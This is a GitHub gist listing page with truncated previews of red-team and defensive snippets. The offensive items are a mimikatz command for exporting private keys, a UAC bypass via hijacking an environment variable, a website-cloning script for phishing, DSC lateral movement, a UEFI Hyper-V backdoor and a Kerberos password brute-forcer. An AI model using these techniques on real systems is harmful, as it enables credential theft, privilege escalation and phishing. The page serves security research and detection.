Skip to content

Instantly share code, notes, and snippets.

View JamesHovious's full-sized avatar

James Hovious JamesHovious

88 followers · 62 following
  • Mandiant
  • Bolzano, Italy
View GitHub Profile
@tothi
tothi / mmimikatz.cna
Last active November 13, 2022 13:51
multi-command mimikatz functionality in a Cobalt Strike beacon
#
# multi-command mimikatz in a Cobalt Strike beacon extending the built-in mimikatz functionality
#
# cmd separator is |
#
# practical example: export machine certificates (including non-exportable private key :)):
#
# mmimikatz "crypto::capi|crypto::certificates /systemstore:local_machine /store:my /export"
#
@mattifestation
mattifestation / PowerShellDSCLateralMovement.ps1
Created March 4, 2018 23:24
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@makelariss
makelariss / uacbypassEnviromentVariableExpansion.py
Last active June 17, 2021 21:13
Tested on Microsoft Windows [Version 10.0.16299.248]
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
'''
from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
@Mr-Un1k0d3r
Mr-Un1k0d3r / cloning.sh
Created November 7, 2017 16:14
Lazy website cloning
#!/bin/bash
echo "Cloning $1"
wget $1 -O index.html &> /dev/null
TAG="<base href=\"$1\"/></head>"
sed '/<\/head>/i\'"$TAG" index.html | tee index.html &> /dev/null
echo "index.html was saved and modified"
@mattifestation
mattifestation / WDAG_CI_Policy.xml
Created October 18, 2017 21:59
Recovered Windows Defender Application Guard Hyper-V Container Code Integrity Policy
<?xml version="1.0"?>
<SiPolicy xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:UMCI</Option>
</Rule>
<Rule>
@curi0usJack
curi0usJack / .htaccess
Last active April 9, 2025 16:33
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@jaredcatkinson
jaredcatkinson / Get-KerberosTicketGrantingTicket.ps1
Last active December 29, 2024 12:06
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
@williballenthin
williballenthin / stackstrings.yara
Last active March 12, 2025 07:04
match x86 that appears to be stack string creation
rule stack_strings
{
meta:
author = "William Ballenthin"
email = "[email protected]"
license = "Apache 2.0"
copyright = "FireEye, Inc"
description = "Match x86 that appears to be stack string creation."
strings:
@Cr4sh
Cr4sh / DmaHvBackdoor.c
Last active January 23, 2024 22:31
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices() which being called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys)
@ropnop
ropnop / kinit_brute.sh
Last active June 6, 2021 18:23
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful